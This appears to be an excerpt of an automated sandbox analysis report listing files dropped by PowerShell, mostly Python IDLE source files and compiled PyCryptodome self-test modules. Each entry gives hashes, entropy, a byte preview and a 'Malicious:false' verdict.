                                                                                                                                                                                                              SHA-512:F9F79956160FF780D1E2B3D6E1FBA6932A1D42EBA31CE576FE6759E92DD3BCC62C496683F711070F23EA4D568B6FF9917E41A4C4364F2A26FD9D31511F595E2B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Pop up a reminder of how to call a function.....Call Tips are floating windows which display function, class, and method..parameter and docstring information when you type an opening parenthesis, and..which disappear when you type a closing parenthesis..."""..import __main__..import inspect..import re..import sys..import textwrap..import types....from idlelib import calltip_w..from idlelib.hyperparser import HyperParser......class Calltip:.... def __init__(self, editwin=None):.. if editwin is None: # subprocess and test.. self.editwin = None.. else:.. self.editwin = editwin.. self.text = editwin.text.. self.active_calltip = None.. self._calltip_window = self._make_tk_calltip_window.... def close(self):.. self._calltip_window = None.... def _make_tk_calltip_window(self):.. # See __init__ for usage.. return calltip_w.CalltipWindow(self.text).... def remove_calltip_window(self, event=
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7285
                                                                                                                                                                                                              Entropy (8bit):4.700925314709351
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:IwjFN1CkcBxptGCkQwSuHGrcqbOi4r8qcWU5IlUR:l5wfJlpCzhO
                                                                                                                                                                                                              MD5:3AA49E1E083600C254CC62E018E1E8A7
                                                                                                                                                                                                              SHA1:8D5ACD1BBAF557D5E92E6D9387676B0D29E37AF9
                                                                                                                                                                                                              SHA-256:1476595EF18D6ADF82D23B435354968683F4099A88FCDB2D814706DA3E3CA4FB
                                                                                                                                                                                                              SHA-512:776643010F0D616F3CBD6D2CF33A590782ABC7BB3C2612434B6884EEBDFDDCAEAB27F5B675554251732028AE5CB79324756189F5905A012F3A22AC0CFD4E140C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""A call-tip window class for Tkinter/IDLE.....After tooltip.py, which uses ideas gleaned from PySol...Used by calltip.py..."""..from tkinter import Label, LEFT, SOLID, TclError....from idlelib.tooltip import TooltipBase....HIDE_EVENT = "<<calltipwindow-hide>>"..HIDE_SEQUENCES = ("<Key-Escape>", "<FocusOut>")..CHECKHIDE_EVENT = "<<calltipwindow-checkhide>>"..CHECKHIDE_SEQUENCES = ("<KeyRelease>", "<ButtonRelease>")..CHECKHIDE_TIME = 100 # milliseconds....MARK_RIGHT = "calltipwindowregion_right"......class CalltipWindow(TooltipBase):.. """A call-tip widget for tkinter text widgets.""".... def __init__(self, text_widget):.. """Create a call-tip; shown by showtip()..... text_widget: a Text widget with code for which call-tips are desired.. """.. # Note: The Text widget will be accessible as self.anchor_widget.. super().__init__(text_widget).... self.label = self.text = None.. self.parenline = self.parencol = self.lastline = None..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11690
                                                                                                                                                                                                              Entropy (8bit):4.391912818094907
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:DktPAfNk3gQXpSe82JCxtj2+ev6fYD3JShSXGFMThOndRe4V7qJJnY9xNOtdito7:DkBYkQQ892+y6gkDZC3JSQos
                                                                                                                                                                                                              MD5:C02B4B83A2F6AC8E829C500AA6C12AE8
                                                                                                                                                                                                              SHA1:DAB1055433BE4560CD5CAC644FF06AADB81F2C8F
                                                                                                                                                                                                              SHA-256:8D93DBC7C9C3B356473ED21AE215C0BF372936966B2C26263CF52D0A35252DAF
                                                                                                                                                                                                              SHA-512:0B446D2739D5951CE06A77CD1D00D8ED82006F1DF779403252D4AE19B52B5868A23321CE260B6C4425B9457F0D0ACCD77BB04CE6007E635598DC8C49BC4D0E27
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""codecontext - display the block context above the edit window....Once code has scrolled off the top of a window, it can be difficult to..determine which block you are in. This extension implements a pane at the top..of each IDLE edit window which provides block structure hints. These hints are..the lines which contain the block opening keywords, e.g. 'if', for the..enclosing block. The number of hint lines is determined by the maxlines..variable in the codecontext section of config-extensions.def. Lines which do..not open blocks are not shown in the context hints pane.....For EditorWindows, <<toggle-code-context>> is bound to CodeContext(self)...toggle_code_context_event..."""..import re..from sys import maxsize as INFINITY....from tkinter import Frame, Text, TclError..from tkinter.constants import NSEW, SUNKEN....from idlelib.config import idleConf....BLOCKOPENERS = {'class', 'def', 'if', 'elif', 'else', 'while', 'for',.. 'try', 'except', 'finally', 'with', 'asyn
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1243
                                                                                                                                                                                                              Entropy (8bit):5.209298515080261
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:dlA/CuT1cnIbMu4kGIT7UUbKce2xDUVbq/l8rznoVmQGn:dS1cnITN7UyKt2x++YnobGn
                                                                                                                                                                                                              MD5:2A2667F5BF5621C1CB0BE2BF4A846366
                                                                                                                                                                                                              SHA1:95B17D16C8859FA8ABD7C0CBB1355DEFEFD4F364
                                                                                                                                                                                                              SHA-256:2E955DD2481769EFDF9D99BA20EC162CB380FDECF7F8F69362006D965FCA6472
                                                                                                                                                                                                              SHA-512:BA82B073A20FC28AD129D19EE8D9397410A21A8CEBF798DD569DFA8F94463FFBFA3AEF596EA75300BFCBB3168A0F4ABD4EF6B8FE3D0084A47399196040A089E0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.eX.........................V.....d.Z.d.Z.i.f.d...Z.e.d.k(..r.d.d.l.Z.d...Z...e.j...................d.............y.y.).z.Self-test for Crypto.Protocolz.$Id$c...........................g.}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.d.d.l.m.}...|.|.j...................|...........z...}.|.S.).N.....)...test_rfc1751)...config)...test_KDF)...test_ecdh)...test_SecretSharing)...Crypto.SelfTest.Protocolr......get_testsr....r....r....).r......testsr....r....r....r....s.... .uC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/Protocol/__init__.pyr....r........sy.........E..5.....AW.AW._e.AW.Af.8f....1.....AS.AS.[a.AS.Ab.8b....2.....AT.AT.\b.AT.Ac.8c....;........)..)....)..8..8.E....L.......__main__r....Nc.....................<.....t.........j...................t.........................S.).N)...unittest..TestSuiter...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39056
                                                                                                                                                                                                              Entropy (8bit):5.773849278374896
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:I3ymnVNzeCZG0emf1O+1rkI39ClNo7JB9+6jDA6fMhL+2lC9Yzp4I2LNc1wqe:ICmnVNdZG0em9Oq39L7JND6Pa84I91wZ
                                                                                                                                                                                                              MD5:39885F7EC6D30469DFC0DAE5AA4FFB87
                                                                                                                                                                                                              SHA1:C068637B7C2EC2B8DBA72BE3D2A06A28B1A7C57B
                                                                                                                                                                                                              SHA-256:597046C727A2F9535466012A1EEFE9E6EC0127A8A5B9815F88725874CE97FB95
                                                                                                                                                                                                              SHA-512:7DED733702362C60ECB798CF8E1DFBAF0EBABD7A257E45296CC3583BE36840BA40FD9B878BF46EEB80778ECD9FADADC016423F39FE69B447B853BEBF0E40CB5F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.........................~.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z ..d...Z!..G.d...d.e"........Z#..G.d...d.e.jH..........................Z%..G.d...d.e.jH..........................Z&..G.d...d.e.jH..........................Z'..G.d...d.e.jH..........................Z(..G.d...d.e.jH..........................Z)..G.d...d.e.jH..........................Z*..G.d...d.e.jH..........................Z+d...Z,..G.d...d.e.jH..........................Z-d...Z...e.e-..........i.f.d...Z/e0d k(..r.d!..Z1..e.jd..................d".#..........y.y.)$.....N)...unhexlify)...b..bchr)...list_test_cases)...load_test_vectors..load_test_vectors_wycheproof)...SHA1..HMAC..SHA256..MD5..SHA224..SHA384..SHA512)...AES..DES3)...PBKDF1..PBKDF2.._S2V..HKDF..scrypt..bcrypt..bcrypt_check..SP800_108_Counter)..._bcrypt_decodec.....................t.....|...y.|.j...................d
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10936
                                                                                                                                                                                                              Entropy (8bit):5.302275992458441
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:VsZnKXV+dxGEi7PUrL8vw761pDPGn54m78G50us1I4:enKl+dx1itl1NPGn5f78G5lX4
                                                                                                                                                                                                              MD5:0E39EFA3DEEC693C6F6732C948494D71
                                                                                                                                                                                                              SHA1:4C3C7E66BCEFAA5DCD8626F9C052053B0E369D9A
                                                                                                                                                                                                              SHA-256:E23C837795A058280CE20E71F7D6B500AD91A2DB0728BB78C36F4EE80F7B03A7
                                                                                                                                                                                                              SHA-512:B19AB3D71FFCF2A41CAE77C681C795A1A698F28E18E090D20EBC545CAAD9A2723E3921167EF5EC8673E21966497A1414169C8612CC1F89AE4DB677E0E6410C4D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.&..............................d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.i.f.d...Z.e.d.k(..r.d...Z...e.d.............y.y.)......)...main..TestCase..TestSuite)...unhexlify..hexlify)...*)...list_test_cases)...Shamir.._Element.._mult_gf2.._div_gf2c...........................e.Z.d.Z.d...Z.d...Z.y.)...GF2_Testsc..........................t.........d.d.........}.|.j...................|.d...........t.........d.d.........}.|.j...................|.d...........d.}.t.........|.|.........}.|.j...................|.d...........t.........|.|.........}.|.j...................|.d...........t.........|.|.........}.|.j...................|.d...........g.d...}.d.}.d.}.t.........|.|.........}.d.}.|.D.]...}.|.t.........|.|.........z...}.....|.j...................|.|...........y.).Nr....."............................).r.............l..........l..........i....).r......assertEqual)...self..x..z
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15972
                                                                                                                                                                                                              Entropy (8bit):5.0287897243277335
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:TUEiP62xReces0meNVyRokp0y8lRF4rwru3rqr3IUvaY7CyyVUMn/5fJ6+CmgiTS:T5i6Wsm0RKsGeiyCfekPGpByMnAM
                                                                                                                                                                                                              MD5:DFD3C45C42248C0DDFCFA0A124EA70F4
                                                                                                                                                                                                              SHA1:96A338F8632C6A9F45AB808965F4D0727950C1A9
                                                                                                                                                                                                              SHA-256:5E25E1EB90B81448CE3B33CB8277AA00EB6F97A66D4C3F58FADB13BE127B2AF8
                                                                                                                                                                                                              SHA-512:B72F76915C6528A99ED0FB531D51774762A8931EDECDEF77A8F1007C57AE2F303AB0C2D6F2B554AE4C288E90A522EAEEC720980E314175F3356D95561D6CBF17
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e *..............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.j"..........................Z...e.d.d.d.d...d...d...d...d...d...........x.s...g.Z...e.e.........D.]...\...Z.Z...e.e.e.........r)..e.j2..................d.e.........Z.e.s.J...e.j7..................d.........Z..8..e.j:..................e.e.j<..................e.j>............................Z ..e.j:..................e.e.jB............................Z"e.jF..................Z$e e"e$f.d...Z%e e"e$f.d...Z&..e'e.d.e.z...e%..........e.d.k(..s.....e'e.d.e.z...e&................G.d...d.e.j"..........................Z(..G.d...d.e.j"..........................Z)i.f.d ..Z*e+d!k(..r.d"..Z,..e.jZ..................d#.$..........y.y.)%.....N)...hexlify)...bord)...SHA256)...ECC)...list_test_cases)...load_test_vectors..load_test_vectors_wycheproof)...key_agreementc...........................e.Z.d.Z.y.)...FIPS_ECDH_Tests_KATN)...__name__..__module_
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2185
                                                                                                                                                                                                              Entropy (8bit):5.343149129146265
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:GPkjuyONl/oVkmozz2xwJDThbAeONy5wvgshbGvOfZoQcRk5OfJ4:LAr/oVk2wJPh8PwmhqmfvcSsfJ4
                                                                                                                                                                                                              MD5:6FA900E328E0C15CE2D5ABAAA1C2F79D
                                                                                                                                                                                                              SHA1:761AA51A39C1EA1D3D61C14F5A3F13737D39E262
                                                                                                                                                                                                              SHA-256:1DDF960DCD61B4CC781CE05DC429CDD9C46F99BED2521AA120178B8BA549DE23
                                                                                                                                                                                                              SHA-512:AB5B68C924A8A4AA3CD6258446DEDA79BAC443239C902EB037AF092D74E683FE4C96AE88FF758313B6167CFB32B8953C23638745A4DCB140EDC5D087BFFB948B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.....g.d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r...e.j.............................y.y.).z.$Id$.....N)...RFC1751)...*).)...EB33F77EE73D4053z.TIDE ITCH SLOW REIN RULE MOT).. CCAC2AED591056BE4F90FD441C534766z8RASH BUSH MILK LOOK BAD BRIM AVID GAFF BAIT ROT POD LOVE).. EFF81F9BFBC65350920CDD7416DE8009z7TROD MUTE TAIL WARM CHAR KONG HAAG CITY BORE O TEAL AWLc...........................e.Z.d.Z.d...Z.y.)...RFC1751Test_k2ec..........................t.........D.]H..\...}.}.t.........j...................t.........|.................}.|.j...................t.........j...................|.........|............J..y.).z Check converting keys to EnglishN)...test_data..binascii..a2b_hex..b..assertEqualr......key_to_english....self..key..wordss.... .yC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/Protoco
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2171
                                                                                                                                                                                                              Entropy (8bit):5.107065900658561
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:NlewEIB0jcQHMsvI/S3oCFS+0mzvYMguTOaT:7ewfFQHvov23Oa
                                                                                                                                                                                                              MD5:16A772A3446659C213576E2764F399D7
                                                                                                                                                                                                              SHA1:88C5C7B483ADAF2E6B9633461BF341C2279A8B5E
                                                                                                                                                                                                              SHA-256:224DAB6C290328730A1E963220152817E26D968CDFFF2E85DCA8CA0D19FA8800
                                                                                                                                                                                                              SHA-512:5E60DB98AB80DC2AB63EB752368B2BF76CB3F0DD320E49E52AE145F27EC6B0FB688711B55013CE3519FAB6BCBEBE7CBF660A835F40AF7A71F30C737428850CA7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/__init__.py: Self-test for public key crypto..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTI
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1703
                                                                                                                                                                                                              Entropy (8bit):4.936080650021637
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:/cVP+EylIztqDoBMoIoaoEomoAoSocoU2kb8Qc2xcWG0wbld8rzU/1mUvVEOb8u3:/8P+mztVV2x5G0wxY0BVEBnwpCa
                                                                                                                                                                                                              MD5:74B9DF80FEAE540D517EBFD2D210C33C
                                                                                                                                                                                                              SHA1:82A0398CA8C7254A5460DC81A7DE4AA2905CE044
                                                                                                                                                                                                              SHA-256:77D4D8E641DCF7C12B6EEE8773715AAAC5B1151C92C507AACDA9BE699CD88D9C
                                                                                                                                                                                                              SHA-512:16745B4BAB95B8FB5409444F5D7817414EC30F050873EF9E93F18E3D2ACF148CD947CE1281B2EA990057A1B2A1BA1FC8C33B6E3489998AB77FEADD08248A1116
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e{.........................~.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.).z.Self-test for public-key crypto.....N)...test_DSA..test_RSA..test_ECC_NIST..test_ECC_25519..test_ECC_448..test_import_DSA..test_import_RSA..test_import_ECC..test_ElGamalc...........................g.}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.S.).N)...config).r......get_testsr....r....r....r....r....r....r....r....).r......testss.... .vC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-package
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15073
                                                                                                                                                                                                              Entropy (8bit):4.923837045827862
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:LfuUgoxD82eH7Q4MufGnJwvl3/XNDkGPabk6HrBp7FISvCjoDh:soBjufGnJwvlfyGPEk42SvvDh
                                                                                                                                                                                                              MD5:BCEB33271DB3E67A364ADC653BA9E4D7
                                                                                                                                                                                                              SHA1:A2BFC3D0EB4A78488C9D2EEDDB036A0CA5875794
                                                                                                                                                                                                              SHA-256:D528197E4269AF7620071ECAE3C73C5922663D808B25BB891EFD2C8F06F92BC6
                                                                                                                                                                                                              SHA-512:42D9204E13D4F5A18681D0867B843489D19503EA069E9227BC4276FFFC5B11383DF67528176D276FFA0F46FA6B64B8A298721BA3B1AA2A3CA1853F055D3ED8AB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.ew&..............................d.Z.d.d.l.Z.d.d.l.....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.).z(Self-test suite for Crypto.PublicKey.DSA.....N)...*)...list_test_cases..a2b_hex..b2a_hexc..........................t.........|.t.................r.d.j...................|.j...................................S.t.........d.........j...................|.j...................................S.).z,Remove whitespace from a text or byte string..)...isinstance..str..join..split..b)...ss.... .vC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/PublicKey/test_DSA.py.._swsr....!...s:.........!.C.......w.w.q.w.w.y..!..!......u.z.z.!.'.'.)..$..$.....c...........................e.Z.d.Z...e.d.........Z...e.d.........Z...e.d.........Z...e.d.........Z...e.d.........Z...e.d.........Z...e.d.........Z...e...e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19619
                                                                                                                                                                                                              Entropy (8bit):4.6141429328744366
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:zqfZ8S+eyXn6XSKumoqRUoLWT0+JinLjMCtiGlf+8035uQh+WQ:Gf+mPZWTdkLjjV1+8035uQXQ
                                                                                                                                                                                                              MD5:2DF2FF3B4960755CDE2935226AE0C12E
                                                                                                                                                                                                              SHA1:021BC260EFBB630F2742131D6A7949CF6CF6EEC9
                                                                                                                                                                                                              SHA-256:1F6009BA28B50E4CB0753B893CF021458786990D6ED83460E491F30890BEEB52
                                                                                                                                                                                                              SHA-512:964197E9B39347B392CE30DD17469B465AA26611E993B862709F433B8779141E69018F900BBD9F05C31B3954F65AB2F3989AE2163F3349D22A08EB664E7C68BF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.6........................(.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j"..........................Z...G.d...d.e.j"..........................Z...G.d...d.e.j"..........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j0..................d.............y.y.)......N)...unhexlify)...list_test_cases)...load_test_vectors)...ECC)...EccPoint.._curves..EccKey)...Integer)...SHAKE128c...........................e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.d.d...Z...e.e.d.....e.d.....d...........Z...e.e.d.....e.d.....d...........Z...e.e.d.....e.d.....d...........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...TestEccPoint_Ed25519......UK..5.J,{.$%Xc.i\.-.G.'.l.J[si.i!.....Xf.L..33ff.L..33ff.L..33ff.L..33ff)...x..y......N.P8.-..E.:E....,.g`t.!.C.@.'&..6......#.U...r`...YT...V>D&#...!8eHB.f`"l....\b.'.!.cj.I,`..!c:.5.Ps%...Q..%N.gl.....4.q!!..@0.d..v..w=M.9.5.:5M.].Xg.r....r......Ed25519....curvec...........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20441
                                                                                                                                                                                                              Entropy (8bit):4.75887553160053
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:zJuDfWj4RYQiPyv8FB0j4Lk9+80yvk7fM:zJuf0GYxyvJck9+80yvgk
                                                                                                                                                                                                              MD5:76B685889117A7800F162B843D8DCEBA
                                                                                                                                                                                                              SHA1:0BAA941DFBE056DBCC1FCC3646E951F1EB9DA67F
                                                                                                                                                                                                              SHA-256:A46349956B7FC28923600C7A31638698C56BBE4981EB73F071A1162F6D86A494
                                                                                                                                                                                                              SHA-512:5A21AC0DF1ED19A9CA3C9FEAA7B730E79C7E08D7ED68660B64CD33E570C1D129EB8433F91A1CD1F72D6D41403916A3ED0034D2831931AC956B7251BA7E6C1018
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.;........................(.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j"..........................Z...G.d...d.e.j"..........................Z...G.d...d.e.j"..........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j0..................d.............y.y.)......N)...unhexlify)...list_test_cases)...load_test_vectors)...ECC)...EccPoint.._curves..EccKey)...Integer)...SHAKE128c...........................e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.d.d...Z...e.e.d.....e.d.....d...........Z...e.e.d.....e.d.....d...........Z...e.e.d.....e.d.....d...........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...TestEccPoint_Ed448.....^@... 51.8.`b8..C..l.\.p*A.t.(.qmj..<..+FaS[./.S..DZ74_3..........zadoeC@...Z.K.^.Dsx.s...sZ.h..Nx..0.2...>Ilq2.. v.I.Zu.gt'.)...x..y.....UU.*UU.*UU.*UU.*UU.*UU.*UU.*UUTU.*UU.*UU.*UU.*UU.*UU.*UU.*U........'U7oWW...9./Y^..aT..,+.....".6.7..!V.=.6.V.!(..Yf..\V..^..l...../...\@9u..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):73763
                                                                                                                                                                                                              Entropy (8bit):4.39088354138461
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:PzLzMhKHRKbl56KHR/blsYZKHRubleKHRUblmPKHRyblNJuAXzYXW5plK4ye:PzLzMhJsAae
                                                                                                                                                                                                              MD5:72B55FB2A052A448F731AC6BD0C1B6E5
                                                                                                                                                                                                              SHA1:52B68AB14546F589EF499BEAE7C7859F0B6A8332
                                                                                                                                                                                                              SHA-256:7CAA012145BDD1163619DE419445D88B2E21F6F90F3455F96DE050B6F78CEF31
                                                                                                                                                                                                              SHA-512:D55EC2F90DC3E8B3F040134CF4AA9696AA5E32AD4D39D25978A0AA1064B3BA4AFD79D306BBAC69506C29D1180F3C41093AFAF7DFB800B58F835401087241A1A0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e$..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...e.d.d.d.d...d...d...d...........x.s...g.Z.e.D.]>..Z.e.j2..................e.j4..................e.j6..................f.d...Z...e.e.d.e.j<..................z...e............@....G.d...d e.j...........................Z...e.d.d!d"d#..d$..d%..d...........x.s...g.Z.e.D.]>..Z.e.j2..................e.j4..................e.j6..................f.d&..Z...e.e.d.e.j<..................z...e............@....G.d'..d(e.j...........................Z ..e.d.d)d*d+..d,..d-..d...........x.s...g.Z.e.D.]>..Z.e.j2..................e.j4..................e.j6..................f.d...Z...e.e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11083
                                                                                                                                                                                                              Entropy (8bit):5.432911890250734
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:2qDWBoP2wH4Mz8qQ22MudNGFYgTBSvqRUfRVi3iqPprpxqOAdxQ+6:2zB09Yq8qQNMurGqu8vqGJVc3xqOAdxa
                                                                                                                                                                                                              MD5:0D206019B0571E266D68D502FCBCB8CC
                                                                                                                                                                                                              SHA1:95F3F6A43D9590EFAEFF22D11D8F2F733A376281
                                                                                                                                                                                                              SHA-256:F9197CBC01624E9C5F5FCFD0DC39DF4BC774DB9C49E17E2A76F335AF98BE253A
                                                                                                                                                                                                              SHA-512:EE355B2E9F4A08E4DE348DCDEA094B4C0D4AD990CE4CA43EC684A2D4234DDA6465B48BED179569907811FA609AF63DBF2FE00198CB848EF60BB53CC4A449C532
                                                                                                                                                                                                              Malicious:false
